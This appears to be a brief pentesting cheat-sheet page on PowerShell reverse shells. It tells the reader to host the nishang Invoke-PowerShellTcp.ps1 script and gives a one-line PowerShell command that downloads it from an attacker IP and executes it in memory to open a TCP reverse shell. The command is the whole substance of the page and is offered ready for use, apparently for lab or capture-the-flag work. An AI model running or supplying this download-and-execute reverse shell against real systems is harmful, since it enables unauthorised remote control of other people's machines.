Skip to main content

Powershell Webshells

Powershell reverse shell - nishang

Host the nishang file Invoke-PowerShellTcp.ps1 for tcp reverse shell on the server

powershell.exe -c IEX(New-Object Net.WebClient).downloadString('http://10.10.14.15:80/Invoke-PowerShellTcp.ps1')